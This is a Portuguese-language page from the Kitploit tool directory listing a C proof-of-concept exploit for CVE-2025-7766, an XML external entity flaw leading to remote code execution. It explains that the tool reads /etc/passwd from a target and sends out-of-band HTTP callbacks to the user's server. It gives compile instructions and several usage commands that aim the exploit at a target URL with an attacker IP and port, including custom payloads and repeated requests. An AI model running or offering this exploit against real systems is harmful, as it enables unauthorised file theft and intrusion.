Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-7766 — PoC de exploração em C para o CVE-2025-7766 que demonstra XXE-para-RCE via leitura de arquivos e callbacks HTTP fora de banda. Suporta payloads XML personalizados e solicitações repetidas. | Kitploit
Ferramentas/GitHubGitHub/bytereaper77/cve-2025-7766
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de PayloadsArchived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

PoC de exploração em C para o CVE-2025-7766 que demonstra XXE-para-RCE via leitura de arquivos e callbacks HTTP fora de banda. Suporta payloads XML personalizados e solicitações repetidas.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-7766 - Exploit PoC

PoC para explorar a vulnerabilidade de Entidade Externa XML (XXE) na CVE-2025-7766. Demonstra leitura de arquivo (/etc/passwd) e callbacks HTTP fora-de-banda.

Autor: Byte Reaper

CVE: CVE-2025-7766

Vulnerabilidade: Execução Remota de Código via Entidade Externa XML (XXE)


PoC para explorar XXE na CVE-2025-7766. Demonstra:

  • Leitura de /etc/passwd do alvo.
  • Disparo de requisição HTTP fora-de-banda para o seu servidor.

Requisitos

  • gcc
  • libcurl
  • biblioteca argparse

Compilação

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

Uso

root@kitploit:~
# Read file payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-band request payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# Custom payload
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# Repeat requests 5 times
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# Verbose output
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

LICENÇA:

MIT

Baixar ferramenta